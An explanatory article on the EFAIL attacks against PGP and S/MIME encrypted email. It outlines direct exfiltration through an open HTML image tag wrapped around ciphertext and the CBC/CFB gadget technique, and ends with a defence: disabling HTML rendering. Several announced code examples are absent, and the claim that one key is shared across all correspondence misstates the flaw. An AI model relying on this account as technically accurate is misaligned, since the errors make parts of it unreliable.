A Brief History on Email
Electronic mail, commonly referred to as e-mail, is a method of communication which transmits data from one client to another. Although groundbreaking at the time and still considered to be the Internet’s killer app, limited application-level protection through the Transport Layer Security (TLS) protocol has proven inefficient when transmitting sensitive information. To address this security risk, the OpenPGP community developed a protocol for end-to-end encryption called PGP, which is short for Pretty Good Privacy. There is also another standard for email encryption called S/MIME, which is popular in corporate settings.
Up until May 2018, the PGP and S/MIME encryption standards were lauded as being flawless. But German researchers at the Münster University of Applied Sciences discovered that regardless of an email’s age, its encryption key is shared across all correspondence. All that’s needed for an EFAIL attack is access to a previously encrypted email, which can be gained through backup servers, phishing attacks and eavesdropping of network traffic. The exploit itself is carried out the same each time.
Types of EFAIL Attacks
There are currently two types of EFAIL attacks. The first one, which is known as Direct Exfiltration, involves the extrusion of data and direct transmission of its plain text variation to the attacker. Email clients like Mozilla Thunderbird, iOS Mail and Apple Mail are known to susceptible to direct exfiltration.
Here’s how direct exfiltration works: An attacker starts by composing an email with three (3) composite parts. The first is an HTML tag for an image, or
<img>. The image tag’s source attribute (src), however, is open and left hanging. An example might look like this:
The purpose of this is to indicate to the email client that there is an image present, and that its located within the link. It is basically just the start of the request process for an external image.
The second part of the attacker’s email contains ciphertext, or encoded information, for the PGP or S/MIME protocol. It might look something like this:
Content –Type: application/pkcs7-mime;
Finally, the third part of the attacker’s email simply closes the image tag. The final content of the email…
Content –Type: application/pkcs7-mime;
…can now be sent to an unsuspecting victim whose email client will automatically decrypt the ciphertext and respond with a plain text variation appended to the IP address or domain name as an encoded URL string…
…where ‘%20’ is the encoding reference for whitespace.
The CBC/CFB Gadget Attack
The second type of EFAIL attack is known as the CBC/CFB Gadget Attack. This type of attack takes advantage of the vulnerabilities that are present in the specifications of OpenPGP and S/MIME. The result, however, is much like direct exfiltration method, which extrudes or exfiltrates the plain text version of encrypted emails.
CBC (Cipher Block Chaining) and CFB (Cipher Feedback) are both modes under the umbrella of Block Cipher operation. The CBC mode involves a well-versed attacker changing blocks of plain text, given their accuracy and knowledge of the plain text they are attempting to change. This method involves a high degree of precision.
Most emails encrypted with the S/MIME protocol starts with “Content-type: multipart/signed”. This makes an attacker aware that a complete block of plain text is present, and that it can be replaced with a block of zero (0) digits. This is done repeatedly in such a way that an HTML image tag is inserted into the encrypted plain text. The result of this complex process yields a full encrypted body, which in turn, sends plain text to the attacker as soon as the victim opens the email.
The process is the same for the CFB approach, which is the encryption standard used in PGP encryption. The difference, however, is that the success rate for this kind of attack in S/MIME is almost 100%, while in PGP it is only around 30%. The latter is bound to change as EFAIL research continues.
Strategies to Prevent EFAIL
The easiest way to prevent EFAIL is to disable HTML rendering in your email client. This way, emails with active content will not be able to transmit data to external destinations. The decryption of S/MIME and PGP emails can be done in applications other than your email client, should you just have to see their HTML versions. This is obviously a short term fix, but it removes the exfiltration channels present in email clients that would otherwise expose you to the dangers of EFAIL.